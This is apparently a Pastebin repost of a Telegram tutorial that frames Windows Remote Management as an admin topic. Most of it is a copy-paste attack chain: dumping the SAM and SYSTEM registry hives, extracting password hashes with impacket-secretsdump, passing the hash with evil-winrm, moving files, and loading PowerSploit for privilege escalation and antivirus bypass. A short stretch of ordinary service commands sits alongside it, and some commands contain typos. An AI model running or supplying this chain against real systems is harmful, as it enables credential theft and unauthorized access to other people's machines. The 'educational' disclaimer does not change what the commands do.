Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hey there! 👋 Are you ready to dive into the world of Windows Remote Management (WinRM)? Let's explore how this powerful protocol empowers administrators to manage Windows systems remotely, right from the comfort of their desks!
- ******************************************
- Telegram post https://t.me/efxtv2/3731
- ******************************************
- 🚨 ⚠️ Disclaimer: This post is for educational purposes only. It aims to raise awareness about security vulnerabilities and help safeguard your systems. Unauthorized access to computer systems is illegal and unethical. Always seek permission before testing or analyzing systems you don't own. Due to limitations, we can't share videos here (we never evade Telegram T&C in any situation).
- WinRM (Windows Remote Management) is a game-changer, allowing you to execute commands and scripts on remote systems without the hassle of physical access. It's like having a magic wand to perform various administrative tasks, from configuration to troubleshooting, all from a central location.
- ⭐️ But wait, before we begin, let's ensure you're equipped with the right tools:
- 1. reg.exe: Extract SAM and SYSTEM files (Exclusive for private users)
- 2. impacket-secretsdump: Get the hash from SAM and SYSTEM
- 3. evil-winrm: Login to Windows remotely
- 4. PowerShell: Execute commands and scripts
- 5. PowerSploit: Your arsenal for bypassing antivirus and more
- Now, let's get started with some cool WinRM commands and tricks:
- ⭐️ Copy the SAM and SYSTEM files to Kali Linux:
- reg.exe save hklm\sam SAM
- reg.exe save hklm\system SYSTEM
- ⭐️ Get the hash out of SAM and SYSTEM:
- impacket-secretsdump -sam $PWD/SAM -system $PWD/SYSTEM LOCAL
- ⭐️ Login to Windows using evil-winrm:
- revil-winrm -i 192.168.1.43 -u demo -H hashesddddddddddddlk
- ⭐️ After getting the shell, upload and download files:
- upload filename
- download filename
- ⭐️ Explore more with evil-winrm:
- Get-Process
- Whoami /groups
- menu
- ⭐️ Ready for some advanced techniques? Let's bypass antivirus like a pro:
- ⭐️ Use PowerSploit to elevate privileges:
- git clone https://github.com/PowerShellMafia/PowerSploit.git
- revil-winrm -i 192.168.1.43 -u demo -H hashesddddddddddddlk -s ~/tools/PowerSploit/Privesc
- ⭐️ Unlock the full potential of WinRM with these admin commands:
- ⭐️ Enable WinRM service on Windows 10:
- Enable-PSRemoting -Force
- ⭐️ Check WinRM status:
- Get-Service WinRM
- ⭐️ Encountering errors? No worries! Here's how to fix them:
- ⭐️ Fix WinRM firewall exception error:
- - Change network connection type to Private
- Enable-PSRemoting -Force
- Get-Service WinRM
- ⭐️ Now, let's access Windows via CLI and GUI:
- ⭐️ CLI access with evil-winrm:
- evil-winrm -i 192.168.1.41 -u demo -p 'demo'
- ⭐️ GUI access with Remmina:
- sudo apt install remmina
- settings>system>rdp enable
- 192.168.1.41:3389
- ⭐️ Manage WinRM service:
- ⭐️ Stop WinRM service:
- Stop-Service -Name WinRM
- ⭐️ Check WinRM service status:
- Get-Service WinRM
- ⭐️ Start WinRM service:
- Start-Service -Name WinRM
- Unlock the full potential of WinRM and take your Windows management to the next level! 🚀🔒
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement